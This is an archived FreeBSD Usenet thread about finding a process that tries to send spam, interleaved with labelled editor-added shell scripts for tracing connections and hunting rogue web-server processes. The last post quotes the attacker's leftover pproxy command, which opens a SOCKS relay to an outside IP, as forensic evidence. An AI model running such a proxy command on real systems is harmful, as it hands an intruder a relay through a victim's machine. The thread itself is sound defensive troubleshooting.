comp.unix.bsd.freebsd.misc: locating malware

Subject                     Author
* locating malware          Mike Scott
+- Re: locating malware     John D Groenveld
+* Re: locating malware     Matthias Meyser
|`* Re: locating malware    Mike Scott
| `- Re: locating malware   Mike Scott
`- Re: locating malware     Gerhard Strangar

locating malware

https://www.rocksolidbbs.com/devel/article-flat.php?id=155&group=comp.unix.bsd.freebsd.misc#155

From: usenet.16@scottsonline.org.uk.invalid (Mike Scott)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: locating malware
Date: Thu, 10 Feb 2022 16:39:59 +0000
Organization: Scott family
Lines: 23
Message-ID: <su3f50$tts$1@dont-email.me>
 by: Mike Scott - Thu, 10 Feb 2022 16:39 UTC

Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
has been trying, and fortunately failing, to send junk mail to an MS
machine, possibly a hotmail destination (certainly MS network). It's
firewalled in now, but it was sending

EHLO localhost
MAIL FROM:<info@newretail.live>

and then closing the connection.

A full clamav scan is currently running but will take quite a few hours.

So, given an unknown program that is occasionally trying to make an
outbound link, can anyone suggest please how to find it?

Thanks.

--
Mike Scott
Harlow, England

Re: locating malware

https://www.rocksolidbbs.com/devel/article-flat.php?id=156&group=comp.unix.bsd.freebsd.misc#156

From: groenveld@acm.org (John D Groenveld)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
References: <su3f50$tts$1@dont-email.me>
Organization: Groenveld.US
Lines: 11
Message-ID: <f7eNJ.41594$%uX7.39403@fx38.iad>
Date: Thu, 10 Feb 2022 19:58:03 GMT
 by: John D Groenveld - Thu, 10 Feb 2022 19:58 UTC

In article <su3f50$tts$1@dont-email.me>,
Mike Scott <usenet.16@scottsonline.org.uk.invalid> wrote:
>So, given an unknown program that is occasionally trying to make an
>outbound link, can anyone suggest please how to find it?

Assuming you trust the host, Bad Idea[tm], you can run lsof on it:
<URL:https://people.freebsd.org/~abe/>
<URL:https://www.freshports.org/sysutils/lsof/>

John
groenveld@acm.org

Re: locating malware

https://www.rocksolidbbs.com/devel/article-flat.php?id=157&group=comp.unix.bsd.freebsd.misc#157

From: matthias@harz.de (Matthias Meyser)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
Date: Thu, 10 Feb 2022 22:14:28 +0100
Organization: XeNET GmbH, 38678 Clausthal-Zellerfeld
Message-ID: <su3v7v$297n$1@nntp.serx01.xenet.de>
References: <su3f50$tts$1@dont-email.me>
In-Reply-To: <su3f50$tts$1@dont-email.me>
 by: Matthias Meyser - Thu, 10 Feb 2022 21:14 UTC

On 10.02.2022 at 17:39, Mike Scott wrote:
> Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
> has been trying, and fortunately failing, to send junk mail to an MS
> machine, possibly a hotmail destination (certainly MS network). It's
> firewalled in now, but it was sending
>
> EHLO localhost
> MAIL FROM:<info@newretail.live>

fgrep -Ri newretail.live /

--
This e-mail was checked for viruses by Avast antivirus software.
https://www.avast.com/antivirus
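
A scoped version of the fgrep above, added here as an example by the editor and not taken from any post in the thread. "fgrep -Ri string /" works, but it descends into /dev, crosses every mount point (NFS, fuse, memory disks) and cannot see into gzip-compressed files; the script below stays on one filesystem (find -xdev), greps binaries as text so a string embedded in an ELF or a .pyc file is still reported, decompresses .gz files before searching, and shows how to shrink the haystack to files the web-server user could write. It assumes a POSIX sh, find(1) with -xdev and -user, grep -F/-a, and gzip(1) on PATH; the function names and the "www" owner are assumptions for illustration.

```sh
#!/bin/sh
# Added example: a scoped replacement for "fgrep -Ri newretail.live /".
# Assumes POSIX sh, find(1) with -xdev/-user/-mtime, grep -aF and gzip(1).

# find_string_files ROOT NEEDLE
#   Print every regular file under ROOT (without crossing mount points) that
#   contains the literal string NEEDLE, either as-is or after gzip
#   decompression.
find_string_files() {
    root=$1
    needle=$2
    find "$root" -xdev -type f -print | while IFS= read -r f; do
        case "$f" in
            *.gz)
                # decompress into a pipe; grep -q stops at the first hit
                if gzip -dc "$f" 2>/dev/null | grep -qF -- "$needle"; then
                    printf '%s\n' "$f"
                fi
                ;;
            *)
                # -a: treat binary files as text, so a string inside an ELF
                #     or a compiled python file is reported rather than skipped
                if grep -qaF -- "$needle" "$f" 2>/dev/null; then
                    printf '%s\n' "$f"
                fi
                ;;
        esac
    done
}

# recent_files_owned_by ROOT USER DAYS
#   The haystack is usually much smaller than "/": regular files owned by the
#   web-server user (the only user a web-app exploit can normally write as),
#   modified in the last DAYS days. Pipe the result into grep or inspect it
#   directly; a fresh .py or .sh in /tmp or under DocumentRoot is the usual find.
recent_files_owned_by() {
    find "$1" -xdev -type f -user "$2" -mtime -"$3" -print
}

# Live usage on the affected host, e.g.:
#   sh scoped_grep.sh --live / newretail.live
#   sh scoped_grep.sh --recent / www 30
case "${1:-}" in
    --live)   find_string_files "${2:-/}" "${3:-newretail.live}" ;;
    --recent) recent_files_owned_by "${2:-/}" "${3:-www}" "${4:-30}" ;;
esac
```

Run it per filesystem (/, /usr, /var, ...) rather than once over /, since -xdev is what keeps it out of /dev and remote mounts; the trade-off, as Mike notes later in the thread, is that neither variant sees a string that only exists encrypted or obfuscated on disk.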

Re: locating malware

https://www.rocksolidbbs.com/devel/article-flat.php?id=158&group=comp.unix.bsd.freebsd.misc#158

From: g.s@arcor.de (Gerhard Strangar)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
Date: Fri, 11 Feb 2022 06:39:12 +0100
Lines: 8
Message-ID: <j6mb41Fb568U1@mid.individual.net>
References: <su3f50$tts$1@dont-email.me>
In-Reply-To: <su3f50$tts$1@dont-email.me>
 by: Gerhard Strangar - Fri, 11 Feb 2022 05:39 UTC

Mike Scott wrote:

> So, given an unknown program that is occasionally trying to make an
> outbound link, can anyone suggest please how to find it?

Not sure if this works on 11.4:
kldload dtraceall
dtrace -n 'syscall:freebsd:connect:entry {trace(execname)}'
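
John's lsof suggestion and Gerhard's dtrace one-liner both aim at the same question, which process is behind the outbound connect. The script below is an added example by the editor, not code from either post. It shows both approaches side by side: polling sockstat(1) (FreeBSD's base-system equivalent of lsof -nP -i) for sockets to port 25, and a DTrace probe on connect(2) that also records pid, parent pid, uid, the full argument string (execname alone would show only "python3.6" for the process found later in the thread) and the destination address, filtered to one port. Polling misses a connection that lives for milliseconds, which is what Mike describes (EHLO, MAIL FROM, close), so the trace is the one to run for the intermittent case. The sockstat column layout and the sockaddr decoding in the D script are assumptions, not taken from the thread; the sample sockstat output used to test the parser is constructed.

```sh
#!/bin/sh
# Added example: attribute an outbound SMTP connect to a process on FreeBSD.
# Assumes sockstat(1) columns USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN
# ADDRESS, and dtrace(1) with the syscall provider (kldload dtraceall).

# smtp_clients_from_sockstat PORT
#   Read sockstat output on stdin and print "user pid command foreign-address"
#   for every socket whose foreign end is :PORT. Skips the header line and
#   listening/unconnected sockets ("*:*").
smtp_clients_from_sockstat() {
    awk -v port="$1" '
        NR == 1 && $1 == "USER" { next }   # header
        $NF == "*:*"            { next }   # listening or not yet connected
        {
            n = split($NF, a, ":")          # last field is FOREIGN ADDRESS
            if (a[n] == port) print $1, $3, $2, $NF
        }'
}

# poll_smtp_clients PORT INTERVAL
#   Polling variant (what lsof/sockstat give you): loop forever and timestamp
#   every process seen holding a socket to PORT. Cheap, but a connect that is
#   closed within milliseconds falls between two polls.
poll_smtp_clients() {
    while :; do
        sockstat -4 -c | smtp_clients_from_sockstat "$1" | while IFS= read -r line; do
            printf '%s %s\n' "$(date '+%Y-%m-%dT%H:%M:%S')" "$line"
        done
        sleep "${2:-1}"
    done
}

# trace_connects PORT
#   Tracing variant: fires on every connect(2), even if pf drops the SYN
#   afterwards. Clause 1 copies the user sockaddr in; clause 2 prints when it
#   is AF_INET (2) and aimed at PORT. Must run as root.
trace_connects() {
    dtrace -q -n '
    syscall:freebsd:connect:entry
    /arg2 >= sizeof (struct sockaddr_in)/
    {
        this->sa = (struct sockaddr_in *)copyin(arg1, arg2);
    }
    syscall:freebsd:connect:entry
    /arg2 >= sizeof (struct sockaddr_in) && this->sa->sin_family == 2 &&
     ntohs(this->sa->sin_port) == '"$1"'/
    {
        printf("%Y pid=%d ppid=%d uid=%d %s -> %s:%d args=%s\n",
            walltimestamp, pid, ppid, uid, execname,
            inet_ntoa(&this->sa->sin_addr.s_addr), ntohs(this->sa->sin_port),
            curpsinfo->pr_psargs);
    }'
}

# Live usage on the affected host:
#   sh connect_watch.sh --poll 25     # sockstat polling, once a second
#   sh connect_watch.sh --trace 25    # dtrace, prints one line per attempt
case "${1:-}" in
    --poll)  poll_smtp_clients "${2:-25}" 1 ;;
    --trace) trace_connects "${2:-25}" ;;
esac
```

Leave the trace running in a screen or tmux session until the next attempt; pid and ppid are what you then feed to procstat -f/-b (or sockstat -P tcp for that pid) before the process exits, and the args field is what distinguishes a legitimate local MTA from an interpreter that was handed a script.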

Re: locating malware

https://www.rocksolidbbs.com/devel/article-flat.php?id=159&group=comp.unix.bsd.freebsd.misc#159

From: usenet.16@scottsonline.org.uk.invalid (Mike Scott)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
Date: Wed, 16 Feb 2022 14:57:38 +0000
Organization: Scott family
Lines: 27
Message-ID: <suj3d2$p8d$1@dont-email.me>
References: <su3f50$tts$1@dont-email.me> <su3v7v$297n$1@nntp.serx01.xenet.de>
In-Reply-To: <su3v7v$297n$1@nntp.serx01.xenet.de>
 by: Mike Scott - Wed, 16 Feb 2022 14:57 UTC

On 10/02/2022 21:14, Matthias Meyser wrote:
> On 10.02.2022 at 17:39, Mike Scott wrote:
>> Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
>> has been trying, and fortunately failing, to send junk mail to an MS
>> machine, possibly a hotmail destination (certainly MS network). It's
>> firewalled in now, but it was sending
>>
>> EHLO localhost
>> MAIL FROM:<info@newretail.live>
>
> fgrep -Ri newretail.live  /
>
>
>
Thanks to all for the comments.

Unfortunately (perhaps?) there haven't been any outbound attempts
lately, which makes me very uncomfortable. I'm running this one: brute
force, and assumes there's no encryption involved.

But hopefully I'll soon have the system ported to a new and smaller box,
this time using jails for outward-facing services. (An enterprise that's
proven much harder than anticipated!)

--
Mike Scott
Harlow, England

Re: locating malware

https://www.rocksolidbbs.com/devel/article-flat.php?id=162&group=comp.unix.bsd.freebsd.misc#162

From: usenet.16@scottsonline.org.uk.invalid (Mike Scott)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
Date: Thu, 17 Feb 2022 14:54:56 +0000
Organization: Scott family
Lines: 48
Message-ID: <sulnk1$vcb$1@dont-email.me>
References: <su3f50$tts$1@dont-email.me> <su3v7v$297n$1@nntp.serx01.xenet.de>
<suj3d2$p8d$1@dont-email.me>
In-Reply-To: <suj3d2$p8d$1@dont-email.me>
 by: Mike Scott - Thu, 17 Feb 2022 14:54 UTC

On 16/02/2022 14:57, Mike Scott wrote:
.....

After an absence of a few days, similar behaviour is back. Same
destination IP, but zero-length packets with bad checksum:

root@data:/var/tmp # script z tcpdump -nvvv -i pflog0 port 25 and src 192.168.0.1
Script started, output file is z
tcpdump: listening on pflog0, link-type PFLOG (OpenBSD pflog file), capture size 262144 bytes

13:49:15.894711 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 60)
    192.168.0.1.16375 > 104.47.70.33.25: Flags [S], cksum 0x6f28 (incorrect -> 0x69dc), seq 2905393045, win 65535, options [mss 1460,nop,wscale 6,sackOK,TS val 799509169 ecr 0], length 0

However, after shutting down the webserver, I found a couple of
processes still running as www, one of which was

../python -m pproxy -l socks5+in://116.203.212.184:10246/@192.168.0.1,#pproxy:CKjBrJD3 (python3.6)

and which seemed to be in a loop checking the remote end,
static.184.212.203.116.clients.your-server.de.

It looks as though the recent apache path bug opened up my server, and
this was left around. Looks like a proxy mechanism, that's about to be
kill -9'ed.

Thanks all.

Oh, BTW, it's unfortunate that 11.4 froze with the package repository
stuck on the buggy version (path backtrack) of apache. I'd have hoped
someone would put in just the one bug-fix update.

--
Mike Scott
Harlow, England
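
Two checks that turn the evidence in the post above into a process name, added here as an example by the editor and not code from the thread. First, the pflog capture carries the source port of the connecting socket (16375 in the post); extracting it and looking it up in sockstat(1) names the owner, provided the process still holds the socket when you look, which it will not for a connect that is closed immediately (the dtrace trace earlier in the thread covers that case). Second, anything running as the web server's user that is not the web server binary is suspect, and a parent pid of 1 after httpd has been stopped means the process outlived the request that spawned it, exactly what Mike found. The tcpdump line format, the ps column order (user,pid,ppid,command), the "www" user and the "httpd" binary name are assumptions taken from the post; the sample capture and ps listing used in testing are constructed, with the pproxy command line copied from the post and a second, unrelated SYN to a TEST-NET address added. One caveat on the capture itself: an "incorrect" TCP checksum on a locally generated SYN is what you see whenever the packet is logged or captured before the NIC fills the checksum in (checksum offload); it is a capture artifact, not evidence of a crafted packet.

```sh
#!/bin/sh
# Added example: from a pflog SYN to the process that sent it, and a sweep for
# processes running as the web-server user that are not the web server.
# Assumes tcpdump -n output of the form "src.port > dst.port: Flags [S], ..."
# and "ps -axo user,pid,ppid,command" column order.

# syn_source_ports DSTPORT
#   Read tcpdump text on stdin; for each SYN to DSTPORT print
#   "srcaddr srcport dstaddr". The srcport is the key for the lookup below.
syn_source_ports() {
    awk -v dport="$1" '
        /Flags \[S\]/ {
            for (i = 1; i <= NF; i++) if ($i == ">") { src = $(i-1); dst = $(i+1) }
            sub(/:$/, "", dst)                  # "104.47.70.33.25:" -> "104.47.70.33.25"
            n = split(dst, d, ".")              # IPv4 a.b.c.d.port: 5 pieces
            m = split(src, s, ".")
            if (d[n] == dport)
                print s[1]"."s[2]"."s[3]"."s[4], s[m], d[1]"."d[2]"."d[3]"."d[4]
        }'
}

# lookup_local_port PORT
#   Name the process that holds local TCP port PORT right now. Field 6 of
#   sockstat -4 -c is LOCAL ADDRESS ("192.168.0.1:16375").
lookup_local_port() {
    sockstat -4 -c | awk -v p="$1" 'NR == 1 || $6 ~ (":" p "$")'
}

# rogue_user_procs USER ALLOWED
#   Read ps output on stdin; print "pid ppid command" for every process owned
#   by USER whose executable basename is not ALLOWED (e.g. www / httpd).
#   "../python -m pproxy ..." has basename "python" and is therefore reported.
rogue_user_procs() {
    awk -v user="$1" -v allowed="$2" '
        NR == 1 { next }                            # USER PID PPID COMMAND header
        $1 == user {
            cmd = $4; sub(/.*\//, "", cmd)          # basename of the executable
            if (cmd != allowed) print $2, $3, substr($0, index($0, $4))
        }'
}

# Live usage on the affected host:
#   sh www_hunt.sh --syns capture.pcap      # SYNs to :25 from a saved pflog/tcpdump file
#   sh www_hunt.sh --lookup 16375           # who owns local port 16375 right now
#   sh www_hunt.sh --rogue www httpd        # www-owned processes that are not httpd
case "${1:-}" in
    --syns)   tcpdump -n -r "${2:?pcap file}" port 25 | syn_source_ports 25 ;;
    --lookup) lookup_local_port "${2:?local port}" ;;
    --rogue)  ps -axo user,pid,ppid,command | rogue_user_procs "${2:-www}" "${3:-httpd}" ;;
esac
```

Before killing a flagged process, record what you will lose with it: procstat -f PID (open files and sockets) and procstat -b PID (the binary path, which for "../python" resolves the relative directory the dropper used), plus ls -l /proc/PID if procfs is mounted. A kill -9 on the proxy removes the symptom; the web-app hole it arrived through, and any cron or rc hook left to restart it, are what the file search earlier in the thread is for.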
